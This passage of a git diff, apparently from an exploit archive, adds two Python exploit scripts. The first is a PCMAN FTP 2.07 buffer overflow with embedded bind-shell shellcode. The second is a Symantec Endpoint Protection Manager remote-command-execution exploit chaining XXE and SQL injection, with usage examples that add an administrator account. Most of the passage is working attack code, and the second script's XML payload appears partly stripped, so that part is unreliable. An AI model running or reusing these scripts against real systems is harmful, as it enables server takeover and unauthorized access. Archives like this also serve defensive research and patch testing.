Exploit Author: Sumit +# Version: 2.07 +# Tested on: Windows XP Professional SP3 +# Description: Buffer overflow is triggered upon sending long string to PCMAN FTP 2.07 in place of command +# + +import socket +import datetime + +""" +You have to take into account your IP addr and servers date (if using NAT, check external IP) as buffer starts like the following: +2014/2/20 [00:40] (00320) 127.0.0.100> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... +""" + +host = '192.168.213.10' + +d = str(datetime.datetime.today()).split()[0].split('-') # You should ideally consider servers date here +for i in range(len(d)): d[i] = str(int(d[i])) +d = '/'.join(d) # Finally we got the date + +# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' +shellcode = ( +"\xda\xdb\xd9\x74\x24\xf4\xbe\xb5\x40\x16\xb6\x5b\x2b\xc9" + +"\xb1\x56\x31\x73\x18\x83\xeb\xfc\x03\x73\xa1\xa2\xe3\x4a" + +"\x21\xab\x0c\xb3\xb1\xcc\x85\x56\x80\xde\xf2\x13\xb0\xee" + +"\x71\x71\x38\x84\xd4\x62\xcb\xe8\xf0\x85\x7c\x46\x27\xab" + +"\x7d\x66\xe7\x67\xbd\xe8\x9b\x75\x91\xca\xa2\xb5\xe4\x0b" + +"\xe2\xa8\x06\x59\xbb\xa7\xb4\x4e\xc8\xfa\x04\x6e\x1e\x71" + +"\x34\x08\x1b\x46\xc0\xa2\x22\x97\x78\xb8\x6d\x0f\xf3\xe6" + +"\x4d\x2e\xd0\xf4\xb2\x79\x5d\xce\x41\x78\xb7\x1e\xa9\x4a" + +"\xf7\xcd\x94\x62\xfa\x0c\xd0\x45\xe4\x7a\x2a\xb6\x99\x7c" + +"\xe9\xc4\x45\x08\xec\x6f\x0e\xaa\xd4\x8e\xc3\x2d\x9e\x9d" + +"\xa8\x3a\xf8\x81\x2f\xee\x72\xbd\xa4\x11\x55\x37\xfe\x35" + +"\x71\x13\xa5\x54\x20\xf9\x08\x68\x32\xa5\xf5\xcc\x38\x44" + +"\xe2\x77\x63\x01\xc7\x45\x9c\xd1\x4f\xdd\xef\xe3\xd0\x75" + +"\x78\x48\x99\x53\x7f\xaf\xb0\x24\xef\x4e\x3a\x55\x39\x95" + +"\x6e\x05\x51\x3c\x0e\xce\xa1\xc1\xdb\x41\xf2\x6d\xb3\x21" + +"\xa2\xcd\x63\xca\xa8\xc1\x5c\xea\xd2\x0b\xeb\x2c\x1d\x6f" + +"\xb8\xda\x5c\x8f\x2f\x47\xe8\x69\x25\x67\xbc\x22\xd1\x45" + +"\x9b\xfa\x46\xb5\xc9\x56\xdf\x21\x45\xb1\xe7\x4e\x56\x97" + +"\x44\xe2\xfe\x70\x1e\xe8\x3a\x60\x21\x25\x6b\xeb\x1a\xae" + +"\xe1\x85\xe9\x4e\xf5\x8f\x99\xf3\x64\x54\x59\x7d\x95\xc3" + +"\x0e\x2a\x6b\x1a\xda\xc6\xd2\xb4\xf8\x1a\x82\xff\xb8\xc0" + +"\x77\x01\x41\x84\xcc\x25\x51\x50\xcc\x61\x05\x0c\x9b\x3f" + +"\xf3\xea\x75\x8e\xad\xa4\x2a\x58\x39\x30\x01\x5b\x3f\x3d" + +"\x4c\x2d\xdf\x8c\x39\x68\xe0\x21\xae\x7c\x99\x5f\x4e\x82" + +"\x70\xe4\x7e\xc9\xd8\x4d\x17\x94\x89\xcf\x7a\x27\x64\x13" + +"\x83\xa4\x8c\xec\x70\xb4\xe5\xe9\x3d\x72\x16\x80\x2e\x17" + +"\x18\x37\x4e\x32") + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect((host, 21)) + +nop = '\x90'*50 +eip = '\x53\x93\x42\x7E' # EIP = 7E429353; JMP ESP in USER32.dll +myip = s.getsockname()[0] +padding = 'A' * (2029 - (len(d) + len(myip))) + +buf = padding + eip + nop + shellcode + +s.send('%s\r\n' % (buf)) +s.recv(1024) +print 'Payload sent' +s.close() diff --git a/platforms/windows/remote/31853.py b/platforms/windows/remote/31853.py new file mode 100755 index 000000000..0391e7ab2 --- /dev/null +++ b/platforms/windows/remote/31853.py @@ -0,0 +1,83 @@ +import argparse +import httplib + +""" +Exploit Title: Symantec Endpoint Protection Manager Remote Command Execution +Exploit Author: Chris Graham @cgrahamseven +CVE: CVE-2013-5014, CVE-2013-5015 +Date: February 22, 2014 +Vendor Homepage: http://www.symantec.com/endpoint-protection +Version: 11.0, 12.0, 12.1 +Tested On: Windows Server 2003, default SEPM install using embedded database +References: https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt +http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20140213_00 +Details: + +First off, this was a fantastic discovery by Stefan Viehbock. The abuse of the XXE +injection to force SEPM to exploit itself through a separate SQL injection flaw was +particularly amusing. I suspect the majority of SEPM users will have it configured +with the default embedded database, thereby making this a pretty reliable exploit. + +So basically what you are looking for with the XXE injection is a vulnerability +that can be triggered in the ConsoleServlet. When a multipart http request is sent, +the servlet will use a custom MultipartParser class to handle the individual +multipart bodies. When a body is encountered that uses a Content-Type of text/xml, +the Java DocumentBuilder class is used to parse the xml. Since Symantec did not +disallow declared DTD processing, it is vulnerable to the XXE injection. This +appears to be a blind XXE, so a better use of the vulnerability is use it for SSRF. +That leads us to the SQL injection flaw. + +Symantec has an http request handler called ConfigServerHandler that is programmatically +restricted to only handle requests that come from localhost. I guess when they wrote this +they just assumed that there was never going to be a way to send untrusted input to it +since it was always going to be controlled by them. I base this guess on the fact that +there is absolutely no attempt made to validate what input comes in to the +updateReportingVersion function which shoves it directly into a SQL query unfiltered. In +order to trigger the SQL injection you just need to send the SQL injection string in the +"Parameter" url param with the "action" param set to test_av. On a default install of SEPM, +it uses a SQL Anywhere embedded database. Much like MSSQL, SQL Anywhere has an xp_cmdshell +stored procedure to run local OS commands. Using this stored procedure, you can compromise +the server that is running SEPM. + +Example Usage: +python sepm_xxe_exploit.py -t 192.168.1.100 -c "net user myadmin p@ss!23 /add" +python sepm_xxe_exploit.py -t 192.168.1.100 -c "net localgroup Administrators myadmin /add" +""" + +multipart_body = \ +"------=_Part_156_33010715.1234\r\n" + \ +"Content-Type: text/xml\r\n" + \ +"Content-Disposition: form-data; name=\"Content\"\r\n\r\n" + \ +"\r\n" + \ +"]>\r\n" + \ +"\r\n" + \ +"&payload;\r\n" + \ +"\r\n" + \ +"------=_Part_156_33010715.1234--\r\n" +headers = {'Content-Type':"multipart/form-data; boundary=\"----=_Part_156_33010715.1234\""} + +cmdline_parser = argparse.ArgumentParser(description='Symantec Endpoint Protection Manager' + \ +' Remote Command Execution') +cmdline_parser.add_argument('-t', dest='ip', help='Target IP', required=True) +cmdline_parser.add_argument('-p', dest='port', help='Target Port', default=9090, \ +type=int, required=False) +cmdline_parser.add_argument('-ssl', dest='ssl', help='Uses SSL (set to 1 for true)', \ +default=0, type=int, required=False) +cmdline_parser.add_argument('-c', dest='cmd', help='Windows cmd to run (must be in quotes ie "net user")', \ +required=True) +args = cmdline_parser.parse_args() + +if args.ssl == 1: + conn = httplib.HTTPSConnection(args.ip, args.port) +else: + conn = httplib.HTTPConnection(args.ip, args.port) +multipart_body = multipart_body % (args.cmd) +print "\n[*]Attempting to exploit XXE and run local windows command: " + args.cmd +conn.request("POST", "/servlet/ConsoleServlet?ActionType=ConsoleLog", multipart_body, headers) +res = conn.getresponse() +if res.status != 200: + print "[-]Exploit unsuccessful! Server returned:\n" + res.read() +else: + print "[+]Exploit successfully sent!"